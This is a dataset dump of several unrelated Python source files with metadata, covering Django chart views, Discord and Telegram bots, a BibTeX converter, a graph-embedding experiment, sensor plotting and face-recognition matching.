xaxis_rotate=30, is_label_show=True)\n context = dict(\n echart1=shop_bar.render_embed(),\n echart2=comment_bar.render_embed(),\n popular_shop=popular_shop,\n host=REMOTE_HOST,\n script_list=shop_bar.get_js_dependencies()\n )\n return render(request, 'mysite/food3.html', context)\n\n\ndef food_page_fourth(request):\n food = pd.read_csv('../data/food.csv')\n filter_data = food.groupby('type').filter(lambda x: x['name'].count() >= 100)\n score_data = filter_data.groupby('type')['name', 'taste', 'env', 'service'].mean()\n score_data.dropna(inplace=True)\n score_data_name = [i for i in score_data.index]\n score_data_taste = [i for i in score_data['taste']]\n score_data_env = [i for i in score_data['env']]\n score_data_service = [i for i in score_data['service']]\n line = Line(\"各菜系口味、环境、服务平均得分\", width='1200px', title_pos='center', title_top='bottom')\n line.add('口味', score_data_name, score_data_taste, xaxis_rotate=60)\n line.add('环境', score_data_name, score_data_env, xaxis_rotate=60)\n line.add('服务', score_data_name, score_data_service, xaxis_rotate=60)\n taste_high_data = food.sort_values(by='taste', 
ascending=False).head(5)\n env_high_data = food.sort_values(by='env', ascending=False).head(5)\n service_high_data = food.sort_values(by='service', ascending=False).head(5)\n schema = [\n (\"口味\", 10), (\"环境\", 10), (\"服务\", 10)\n ]\n rader1 = Radar(\"口味最好的五家店铺\", width='1000px', title_pos='center', title_top='bottom')\n rader1.config(schema)\n for index, row in taste_high_data.iterrows():\n rader1.add(row['name'], [[row.taste, row.env, row.service]], legend_selectedmode='single')\n rader2 = Radar(\"环境最好的五家店铺\", width='1000px', title_pos='center', title_top='bottom')\n rader2.config(schema)\n for index, row in env_high_data.iterrows():\n rader2.add(row['name'], [[row.taste, row.env, row.service]], legend_selectedmode='single')\n rader3 = Radar(\"服务最好的五家店铺\", width='1000px', title_pos='center', title_top='bottom')\n rader3.config(schema)\n for index, row in service_high_data.iterrows():\n rader3.add(row['name'], [[row.taste, row.env, row.service]], legend_selectedmode='single')\n context = dict(\n echart1=line.render_embed(),\n echart2=rader1.render_embed(),\n echart3=rader2.render_embed(),\n echart4=rader3.render_embed(),\n host=REMOTE_HOST,\n script_list=line.get_js_dependencies()\n )\n return render(request, 'mysite/food4.html', context)\n\n\ndef food_page_fifth(request):\n food = pd.read_csv('../data/food.csv')\n recommends = pd.concat([food['recommend.0'], food['recommend.1'], food['recommend.2']], )\n recommends = pd.DataFrame({'recommend': recommends})\n recommend_data = recommends.groupby('recommend').recommend.count().sort_values(ascending=False).head(200)\n recommend_name = [i for i in recommend_data.index]\n for i, name in enumerate(recommend_name):\n recommend_name[i] = name.strip('不少于')\n recommend_value = [i for i in recommend_data.values]\n worldcloud = WordCloud(width=1000, height=800)\n worldcloud.add(\"\", recommend_name, recommend_value, word_size_range=[10, 100], shape='star')\n context = dict(\n echart=worldcloud.render_embed(),\n host=REMOTE_HOST,\n script_list=worldcloud.get_js_dependencies()\n )\n return render(request, 'mysite/food5.html', context)\n\n\ndef spot_page_first(request):\n spot = pd.read_csv('../data/spot.csv')\n spot_sub_data = spot.head(200)\n spot_title = [i for i in spot_sub_data.title]\n spot_value = [1] * 200\n worldcloud = WordCloud(width=1000, height=800)\n worldcloud.add(\"\", spot_title, spot_value, word_size_range=[10, 10])\n context = dict(\n echart=worldcloud.render_embed(),\n host=REMOTE_HOST,\n script_list=worldcloud.get_js_dependencies()\n )\n return render(request, 'mysite/spot1.html', context)\n\n\ndef house_page_first(request):\n return render(request, 'mysite/house1.html')\n\n\ndef weather_page_first(request):\n weather = pd.read_csv('./data/weather.csv')\n date = [i for i in weather.date]\n max_temp = [i for i in weather['max']]\n min_temp = [i for i in weather['min']]\n line = Line(\"历史天气温度(2011年1月1日至2018年10月31日)\", width=1200, title_pos='center', title_top='bottom')\n line.add(\"一天中最高温度\", date, max_temp, is_datazoom_show=True)\n line.add(\"一天中最低温度\", date, min_temp, is_datazoom_show=True)\n max_max_all = weather.sort_values(by='max', ascending=False).head(3)\n max_max = [row for index, row in max_max_all.iterrows()]\n min_min_all = weather.sort_values(by='min').head(3)\n min_min = [row for index, row in min_min_all.iterrows()]\n above_t = [i for i in range(40, 32, -1)]\n below_t = [i for i in range(-3, 5, 1)]\n above_count = list(map(lambda i: weather[weather['max'] >= i].date.count(), above_t))\n below_count = list(map(lambda i: 
weather[weather['min'] <= i].date.count(), below_t))\n context = dict(\n echart=line.render_embed(),\n host=REMOTE_HOST,\n script_list=line.get_js_dependencies(),\n max_max=max_max,\n min_min=min_min,\n above_t=above_t,\n below_t=below_t,\n above_count=above_count,\n below_count=below_count\n )\n return render(request, 'mysite/weather1.html', context)\n\n\ndef weather_page_second(request):\n weather = pd.read_csv('./data/weather.csv')\n weather_data = weather.groupby('weather').weather.count().sort_values(ascending=False)\n weather_data.loc['其他'] = weather_data[weather_data.values <= 15].count()\n weather_data = weather_data[weather_data.values > 15]\n weather_category = [i for i in weather_data.index]\n weather_count = [i for i in weather_data.values]\n weather_pie = Pie('各种天气所占比例', width='1200px', height='700px', title_pos='center', title_top='bottom')\n weather_pie.add('数量', weather_category, weather_count, radius=[40, 75], label_text_color=None,\n is_label_show=True, legend_orient=\"vertical\", legend_pos=\"left\")\n weather_data_transform = weather.copy()\n for i, w in enumerate(weather_data_transform.weather):\n if w.find('雨') >= 0:\n weather_data_transform.weather[i] = '雨'\n weather_data_transform['date'] = weather_data_transform['date'].map(lambda x: x.split('-')[0])\n grouped = weather_data_transform.groupby(['date', 'weather']).weather.count()\n rain_data = grouped.unstack()['雨']\n year = [i for i in rain_data.index]\n rain_count = [i for i in rain_data.values]\n line = Line(\"每年下雨的天数\", width=800, title_pos='center', title_top='bottom')\n line.add('', year, rain_count)\n context = dict(\n echart1=weather_pie.render_embed(),\n echart2=line.render_embed(),\n host=REMOTE_HOST,\n script_list=weather_pie.get_js_dependencies(),\n )\n return render(request, 'mysite/weather2.html', context)\n\n\ndef weather_page_third(request):\n weather = pd.read_csv('./data/weather.csv')\n direction_data = weather.groupby('direction').direction.count().sort_values(ascending=False)\n direction_data.loc['其他'] = direction_data[direction_data.values <= 2].count()\n direction_data = direction_data[direction_data.values > 2]\n direction = [i for i in direction_data.index]\n direction_count = [i for i in direction_data.values]\n direction_pie = Pie('风向所占比例', width='1000px', height='600px', title_pos='center', title_top='bottom')\n direction_pie.add('数量', direction, direction_count, label_text_color=None, is_label_show=True,\n legend_orient=\"vertical\", legend_pos=\"left\")\n context = dict(\n echart1=direction_pie.render_embed(),\n host=REMOTE_HOST,\n script_list=direction_pie.get_js_dependencies(),\n )\n return render(request, \"mysite/weather3.html\", context)\n", "sub_path": "hangzhou/mysite/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 14695, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.shortcuts.render", "line_number": 10, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "pyecharts.Bar", "line_number": 18, "usage_type": "call"}, {"api_name": "pyecharts.Bar", "line_number": 23, "usage_type": "call"}, {"api_name": "pyecharts.Pie", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 46, "usage_type": "call"}, {"api_name": "pyecharts.Bar", "line_number": 59, "usage_type": "call"}, {"api_name": "pyecharts.Bar", 
"line_number": 66, "usage_type": "call"}, {"api_name": "pyecharts.Scatter", "line_number": 74, "usage_type": "call"}, {"api_name": "pyecharts.Boxplot", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 82, "usage_type": "call"}, {"api_name": "pyecharts.Line", "line_number": 87, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 107, "usage_type": "call"}, {"api_name": "pyecharts.Bar", "line_number": 113, "usage_type": "call"}, {"api_name": "pyecharts.Bar", "line_number": 119, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 128, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 132, "usage_type": "call"}, {"api_name": "pyecharts.Line", "line_number": 140, "usage_type": "call"}, {"api_name": "pyecharts.Radar", "line_number": 150, "usage_type": "call"}, {"api_name": "pyecharts.Radar", "line_number": 154, "usage_type": "call"}, {"api_name": "pyecharts.Radar", "line_number": 158, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 170, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 174, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 175, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 176, "usage_type": "call"}, {"api_name": "pyecharts.WordCloud", "line_number": 182, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 189, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 193, "usage_type": "call"}, {"api_name": "pyecharts.WordCloud", "line_number": 197, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 204, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 208, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 212, "usage_type": "call"}, {"api_name": "pyecharts.Line", "line_number": 216, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 238, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 242, "usage_type": "call"}, {"api_name": "pyecharts.Pie", "line_number": 248, "usage_type": "call"}, {"api_name": "pyecharts.Line", "line_number": 260, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 268, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 272, "usage_type": "call"}, {"api_name": "pyecharts.Pie", "line_number": 278, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 286, "usage_type": "call"}]} +{"seq_id": "87089229", "text": "import discord\nimport os\nimport re\n\nfrom redbot.core import checks, Config, commands\n\nBaseCog = getattr(commands, \"Cog\", object)\n\n\nclass sthcommands(BaseCog):\n\n \"\"\"All STH reaction commands conveniently located in one file!\"\"\"\n\n default_global_settings = {\n \"channels_ignored\": [],\n \"guilds_ignored\": []\n }\n\n def __init__(self, bot):\n self.bot = bot\n self.conf = Config.get_conf(self, identifier=527690525)\n self.conf.register_global(\n **self.default_global_settings\n )\n\n @commands.guild_only()\n @commands.command()\n async def workout(self, ctx, arg):\n \"\"\"Get motivated to workout\"\"\"\n \n msg = arg\n await ctx.send(msg)\n\n\n embed = discord.Embed(\n description = 'ITS TIME MOTHERFUCKER!!!',\n color = discord.Color.red()\n )\n 
embed.set_image(url='https://media1.tenor.com/images/316802abc29c277b08bae799b1fbe52c/tenor.gif')\n        await ctx.send(embed=embed)\n    \n", "sub_path": "sthcommands/sthcommands.py", "file_name": "sthcommands.py", "file_ext": "py", "file_size_in_byte": 1007, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "redbot.core.commands", "line_number": 7, "usage_type": "argument"}, {"api_name": "redbot.core.Config.get_conf", "line_number": 21, "usage_type": "call"}, {"api_name": "redbot.core.Config", "line_number": 21, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 35, "usage_type": "call"}, {"api_name": "discord.Color.red", "line_number": 37, "usage_type": "call"}, {"api_name": "discord.Color", "line_number": 37, "usage_type": "attribute"}, {"api_name": "redbot.core.commands.guild_only", "line_number": 26, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 26, "usage_type": "name"}, {"api_name": "redbot.core.commands.command", "line_number": 27, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "618424406", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 3.4 (3310)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/mendeley2biblatex/__init__.py\n# Compiled at: 2016-07-20 10:13:03\n# Size of source mod 2**32: 1329 bytes\nimport sys\nfrom argparse import ArgumentParser\nfrom mendeley2biblatex.library_converter import LibraryConverter\n__all__ = [\n 'bib_entry', 'library_converter']\n\ndef main():\n    \"\"\"Set up some command line options for this script. See usage.\"\"\"\n    parser = ArgumentParser(description='Convert a sqlite database from mendeley to bibtex')\n    parser.add_argument('-q', '--quiet', action='store_true', default=False, dest='quiet', help='Do not display any information.')\n    parser.add_argument('-f', '--folder', default=None, dest='folder', help='Limit output to mendeley folder')\n    parser.add_argument('-o', '--output', dest='bibtex_file', default=sys.stdout, help='BibTeX file name, else output will be printed to stdout')\n    parser.add_argument('input', metavar='INPUT_FILE', nargs='?', help='the mendeley database')\n    parser.add_argument('--version', action='version', version='mendeley2biblatex')\n    args = parser.parse_args()\n    if not args.input:\n        parser.error('No file specified')\n    LibraryConverter.convert_library(args.input, args.bibtex_file, args.quiet, args.folder)\n\n\nif __name__ == '__main__':\n    try:\n        main()\n    except KeyboardInterrupt:\n        print('Interrupted by user')", "sub_path": "pycfiles/mendeley2biblatex-0.1.8-py3.4/__init__.cpython-34.py", "file_name": "__init__.cpython-34.py", "file_ext": "py", "file_size_in_byte": 1496, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 19, "usage_type": "attribute"}, {"api_name": "mendeley2biblatex.library_converter.LibraryConverter.convert_library", "line_number": 25, "usage_type": "call"}, {"api_name": "mendeley2biblatex.library_converter.LibraryConverter", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "622976454", "text": "from telegram.ext import *\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, KeyboardButton\nimport random\n\n############################### Bot 
############################################\n\ncurrent_balance = 1000\nbet_size = 50\nuser_choice = ''\ndrawn_choice = ''\n\n\ndef start_message():\n return 'Welcome to Eta Eta! A classic game that offers 50/50 chance of winning.'\n\n\ndef start(update, context):\n update.message.reply_text(start_message())\n update.message.reply_text(main_menu_message(drawn_choice, bet_size, current_balance),\n reply_markup=main_menu_keyboard())\n\n\ndef conv(inp):\n if (inp == 'h'):\n return 1\n if (inp == 't'):\n return 0\n if (inp == 'cbs'):\n return 2\n if (int(inp) % 50 == 0):\n return 3\n\n\ndef main_menu(update, context):\n query = update.callback_query\n query.answer()\n cn = random.randint(0, 1)\n if (cn == 0):\n drawn_choice = 'Tails'\n else:\n drawn_choice = 'Heads'\n\n # query.message.reply_text(text=main_menu_message(drawn_choice,bet_size,current_balance),reply_markup=main_menu_keyboard())\n # print(query.data+'\\n')\n if (conv(query.data) == 3):\n global bet_size\n global current_balance\n bet_size = int(query.data)\n query.edit_message_text('Bet size changed to ' + query.data)\n query.message.reply_text(text=main_menu_message(drawn_choice, bet_size, current_balance),\n reply_markup=main_menu_keyboard())\n\n\n else:\n if (query.data == 'cbs'):\n query.edit_message_text('Choose bet size in coins', reply_markup=bet_choice_keyboard())\n if (query.data != 'cbs'):\n if(current_balance cutoff:\n graph.add_edge(node, f'patient:{patient}', value=value, status='sans')\n\n for patient_idx in range(n_patients_with):\n patient = patient_idx + n_nodes + n_patients_sans\n value = with_profile[node, patient_idx]\n if value > cutoff:\n graph.add_edge(node, f'patient:{patient}', value=value, status='with')\n\n print('Nodes', graph.number_of_nodes())\n print('Edges', graph.number_of_edges())\n\n # Fit embedding model to graph\n g2v = Node2Vec()\n g2v.fit(graph, verbose=True) # takes about 1 second\n\n print('Training and evaluating classifier')\n # Train classifier between nodes in community and outside of community\n x = [\n g2v.predict(f'patient:{patient_idx + n_nodes}')\n for patient_idx in range(n_patients_sans)\n ] + [\n g2v.predict(f'patient:{patient_idx + n_nodes + n_patients_sans}')\n for patient_idx in range(n_patients_with)\n ]\n y = [False] * n_patients_sans + [True] * n_patients_with\n\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.33, random_state=42)\n\n print(f'Training on {len(x_train)} samples')\n logistic_regression = LogisticRegression()\n logistic_regression.fit(x_train, y_train)\n\n print(f'Evaluating on {len(x_test)} holdout samples')\n y_pred = logistic_regression.predict(x_test)\n accuracy, mcc = accuracy_score(y_test, y_pred), matthews_corrcoef(y_test, y_pred)\n print('Accuracy:', accuracy)\n print('MCC:', mcc)\n\n return graph, g2v, logistic_regression,\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "src/lpe/network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 3213, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "networkx.generators.duplication.duplication_divergence_graph", "line_number": 21, "usage_type": "call"}, {"api_name": "networkx.algorithms.community.greedy_modularity_communities", "line_number": 24, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": 
"attribute"}, {"api_name": "numpy.random.normal", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 34, "usage_type": "attribute"}, {"api_name": "nodevectors.Node2Vec", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 68, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 71, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 76, "usage_type": "call"}, {"api_name": "sklearn.metrics.matthews_corrcoef", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "318862926", "text": "#! /usr/bin/env python\n#$ -S /home/masaki/programs/anaconda/envs/research/bin/python\n#$ -cwd\n\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib import font_manager as fm\nimport numpy as np\nimport utils\n\ndef main():\n (curr_wk_dir, asset_dir, program_dir, conda_program_dir) = utils.getDirs()\n utils.initMpl()\n input_file = asset_dir + '/func_ncrnas.fa'\n ncrna_types = getNcrnaTypeRatio(input_file)\n print(ncrna_types)\n plt.axis('equal')\n (fig, ax) = plt.subplots()\n legend = ncrna_types.keys()\n colors = ['aqua', 'yellowgreen', 'gold', 'lightskyblue', 'lightcoral', 'magenta']\n radius = 1.0\n (patches, texts, autotexts) = ax.pie(ncrna_types.values(), colors = colors, autopct = '%1.1f%%', shadow = False, startangle = 90, radius = radius, pctdistance = radius * 1.15)\n ax.set_aspect('equal')\n ax.legend(patches, legend, loc = 2)\n # ax.set_title('Ratio of ncRNAs of type')\n proptease = fm.FontProperties()\n proptease.set_size('x-large')\n plt.setp(autotexts, fontproperties = proptease)\n # plt.show()\n fig.savefig(asset_dir + '/images/func_ncrna_stats.eps', bbox_inches = 'tight')\n \ndef getNcrnaTypeRatio(file): \n input_handle = open(file, 'rU')\n lines = input_handle.readlines()\n input_handle.close()\n ncrna_types = {}\n for line in lines: \n if not line.startswith('>'): \n continue\n rna_str_pos = line.find('RNA')\n ncrna_type = 'pseudogene' if rna_str_pos == -1 else line[3 : rna_str_pos].lower() + line[rna_str_pos : rna_str_pos + 3]\n if ncrna_type.find('tRNA') != -1: \n ncrna_type = 'tRNA'\n try: \n ncrna_types[ncrna_type] += 1\n except: \n ncrna_types[ncrna_type] = 1 \n return ncrna_types\n\nif __name__ == '__main__':\n main()\n", "sub_path": "src/get_func_ncrna_stats.py", "file_name": "get_func_ncrna_stats.py", "file_ext": "py", "file_size_in_byte": 1697, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "utils.getDirs", "line_number": 12, "usage_type": "call"}, {"api_name": "utils.initMpl", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.font_manager.FontProperties", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.font_manager", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]} +{"seq_id": 
"281036527", "text": "# -*- coding: utf-8 -*-\nfrom PyQt4.QtCore import *\n# ---\nfrom datetime import datetime\nfrom datetime import timedelta\n# ---\nfrom dbgw import DbgwLite, DbgwMy\nfrom curve_pull import CurvePull\nfrom utils import *\nfrom excs import *\n\nDEFAULT_SELECT_INTERVAL = 48 # hours\nDEFAULT_X_SCALE_INTERVAL = 12 # hours\nDEFAULT_STEP_SIZE = 3600.0 # seconds\n\nTMP_INDEX = 0\nHMD_INDEX = 1\nMQ135_INDEX = 2\nMQ7_INDEX = 3\nPHOTO_INDEX = 4\n\nclass Plotter():\n\n def __init__(self):\n # ---\n self.db = None\n self.model = {}\n # ---\n\n def initialized(self):\n if not self.db:\n return False\n return True\n\n def init_my(self, params):\n self.db = DbgwMy()\n if not self.db.connect(params):\n return False\n return self.init_model()\n\n def init_lite(self, filename):\n self.db = DbgwLite()\n if not self.db.connect(filename):\n return False\n return self.init_model()\n\n def init_model(self):\n # ---\n init_date = self.db.get_dt_start()\n init_stamp = timestamp(init_date)\n to_date = self.db.get_dt_finish()\n from_date = to_date - timedelta(hours=DEFAULT_SELECT_INTERVAL) \n for device_tuple in self.db.select_devices():\n device = device_tuple[0]\n pull = CurvePull()\n stamps = []\n values = {}\n # -- data\n for row in self.db.select_data(device, from_date, to_date):\n stamps.append(timestamp(row[0]) - init_stamp)\n for index, value in enumerate(row[1:]):\n values.setdefault(index, []).append(value)\n pull.set_x_data(stamps)\n for index in sorted(values.keys()):\n pull.set_y_data(index, values[index])\n # --- x_scale\n x_max = stamps[-1]\n x_min = timestamp(to_date - timedelta(hours=DEFAULT_X_SCALE_INTERVAL)) - init_stamp\n pull.set_x_scale(x_min, x_max)\n # --- motion\n motion_stamps = []\n for row in self.db.select_event(device, 'MOTION', init_date, to_date): # !!! take all motions\n motion_stamps.append(timestamp(row[0]) - init_stamp)\n pull.set_m_markers(motion_stamps)\n # --- info\n info_stamps = []\n for row in self.db.select_event(device, 'INFO', init_date, to_date): # !!! take all info\n label = row[1]\n if label == \"ARDUINO STARTED\":\n label = \"*\"\n info_stamps.append((timestamp(row[0]) - init_stamp, label))\n pull.set_i_markers(info_stamps)\n # --- error\n error_stamps = []\n for row in self.db.select_event(device, 'ERROR', init_date, to_date): # !!! 
take all errors\n error_stamps.append((timestamp(row[0]) - init_stamp, row[1]))\n pull.set_e_markers(error_stamps)\n # ---\n self.model[device] = pull\n # ---\n self.init_date, self.from_date, self.to_date = init_date, from_date, to_date\n self.finish_date = self.db.get_dt_finish()\n self.init_stamp = init_stamp\n return True\n\n def get_more_data(self):\n to_date = self.from_date\n from_date = to_date - timedelta(hours=DEFAULT_SELECT_INTERVAL)\n if from_date < self.init_date:\n return\n init_stamp = timestamp(self.init_date)\n for device in self.devices():\n pull = self.model[device]\n stamps = []\n values = {}\n # -- data\n for row in self.db.select_data(device, from_date, to_date):\n stamps.append(timestamp(row[0]) - init_stamp)\n for index, value in enumerate(row[1:]):\n values.setdefault(index, []).append(value)\n pull.prepend_x_data(stamps)\n for index in sorted(values.keys()):\n pull.prepend_y_data(index, values[index])\n # ---\n self.from_date, self.to_date = from_date, to_date\n\n def devices(self):\n return sorted(self.model.keys())\n\n def curve(self, device, index):\n return self.model[device].curve(index)\n\n def x_scale(self, device):\n return self.model[device].get_x_scale()\n\n def m_markers(self, device):\n return self.model[device].get_m_markers()\n\n def i_markers(self, device):\n return self.model[device].get_i_markers()\n\n def e_markers(self, device):\n return self.model[device].get_e_markers()\n\n def back_step(self):\n for device in self.devices():\n pull = self.model[device]\n try:\n pull.move_scale_left( DEFAULT_STEP_SIZE )\n except ScaleError:\n self.get_more_data()\n\n def forward_step(self):\n for device in self.devices():\n pull = self.model[device]\n try:\n pull.move_scale_right( DEFAULT_STEP_SIZE )\n except ScaleError:\n pass\n\n def x_scale_dt(self):\n from_date = self.finish_date\n to_date = self.init_date\n for device in self.devices():\n scale_min, scale_max = self.x_scale(device)\n scale_min_dt = from_timestamp(scale_min + self.init_stamp)\n scale_max_dt = from_timestamp(scale_max + self.init_stamp)\n from_date = min(from_date, scale_min_dt)\n to_date = max(to_date, scale_max_dt)\n return from_date, to_date\n\n def timestamp_dt(self, stamp):\n return from_timestamp(stamp + self.init_stamp)\n\n", "sub_path": "plotter.py", "file_name": "plotter.py", "file_ext": "py", "file_size_in_byte": 5562, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "dbgw.DbgwMy", "line_number": 36, "usage_type": "call"}, {"api_name": "dbgw.DbgwLite", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 52, "usage_type": "call"}, {"api_name": "curve_pull.CurvePull", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 68, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "290058908", "text": "from django.urls import path\nfrom customers.views import (\n\tcustomer_create_view, \n\tcustomer_detail_view, \n\tcustomer_delete_view, \n\tcustomer_list_view,\n\tcustomer_update_view,\n\n)\n\napp_name = 'customers'\nurlpatterns = [\n path('create/', customer_create_view),\n path('/', customer_detail_view, name='customer-detail'),\n path('/update', customer_update_view, name='customer-update'),\n path('/delete', customer_delete_view, name='customer-delete'),\n path('', customer_list_view, name='customer-list'),\n\n]\n", "sub_path": "src/customers/urls.py", "file_name": "urls.py", 
"file_ext": "py", "file_size_in_byte": 548, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "customers.views.customer_create_view", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "customers.views.customer_detail_view", "line_number": 14, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "customers.views.customer_update_view", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "customers.views.customer_delete_view", "line_number": 16, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "customers.views.customer_list_view", "line_number": 17, "usage_type": "argument"}]} +{"seq_id": "217659164", "text": "import face_recognition\r\nimport os\r\nfrom PIL import Image\r\nimport pickle\r\nimport gzip\r\n#pathik = \"/root/env/megasuperfacedetectionbot/\"\r\npathik = \"\"\r\ndef listdir_nohidden(path):\r\n for f in os.listdir(path):\r\n if not f.startswith('.'):\r\n yield f\r\n\r\ndef analyzeValues(values):\r\n try: \r\n return int((sum(values)/len(values)))\r\n except: \r\n return 0\r\n\r\n\r\n\r\ndef checkFace(**kwargs):\r\n\terrorCounter=0\r\n\tmaxValue=0\r\n\tmostLikely=\"unknown\"\r\n\tanalyze = -1\r\n\t#path=f\"{pathik}faces/known_faces/\"\r\n\tpath=\"faces/known_faces/\"\r\n\tWDILL = face_recognition.load_image_file(\"WDILL.jpg\")\r\n\tWDILLenc=face_recognition.face_encodings(WDILL)\r\n\tfiles = listdir_nohidden(path)\r\n\tfor file in files:\r\n\t\tfaces = listdir_nohidden(path+file+\"/faceEncodings/\")\r\n\t\tfor face in faces:\r\n\t\t\twith gzip.open(path+file+\"/faceEncodings/\"+face, 'rb') as f:\r\n\t\t\t\ttry:\r\n\t\t\t\t\timageEncoding = pickle.load(f)\r\n\t\t\t\t\tanalyze=((1-(face_recognition.face_distance(imageEncoding,WDILLenc))[0])*100)\r\n\t\t\t\t\tf.close()\r\n\t\t\t\texcept:\r\n\t\t\t\t\terrorCounter+=1\r\n\t\t\t\t\t#analyze=analyzeValues(percentage)\r\n\t\tif(kwargs.get(\"outputEveryLine\",True)==True):\r\n\t\t\tyield (\"You look like \"+file+\" with \"+str(analyze)+\"chance\")\r\n\t\tif (analyze>maxValue):\r\n\t\t\tmaxValue=analyze\r\n\t\t\tmostLikely=file\r\n\t\t\t#percentage=[]\r\n\tyield \"end\"\r\n\tyield \"end\"\r\n\t#answer = str(\"most likely you look like \"+(mostLikely)+\" with \"+str(maxValue)+\"chance\\nErrors:\"+str(errorCounter))\r\n\tanswer = \"most likely you look like \" + str(mostLikely) + \" with \" + str(maxValue)+\" percent chance \\n Errors:\" +str(errorCounter)\r\n\tyield answer\r\n\tif(kwargs.get(\"getFinalFace\",False)==True):\r\n\t\tim1 = Image.open(path+mostLikely+\"/main.jpg\")\r\n\t\tim1 = im1.save(f\"{pathik}mostLikely.jpg\")\r\n\r\n \r\n\r\nfor i in checkFace(getFinalFace=True,outputEveryLine=False):\r\n print(i)", "sub_path": "checkGenerator.py", "file_name": "checkGenerator.py", "file_ext": "py", "file_size_in_byte": 1802, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.listdir", "line_number": 9, "usage_type": "call"}, {"api_name": "face_recognition.load_image_file", "line_number": 28, "usage_type": "call"}, {"api_name": "face_recognition.face_encodings", "line_number": 29, "usage_type": "call"}, {"api_name": "gzip.open", 
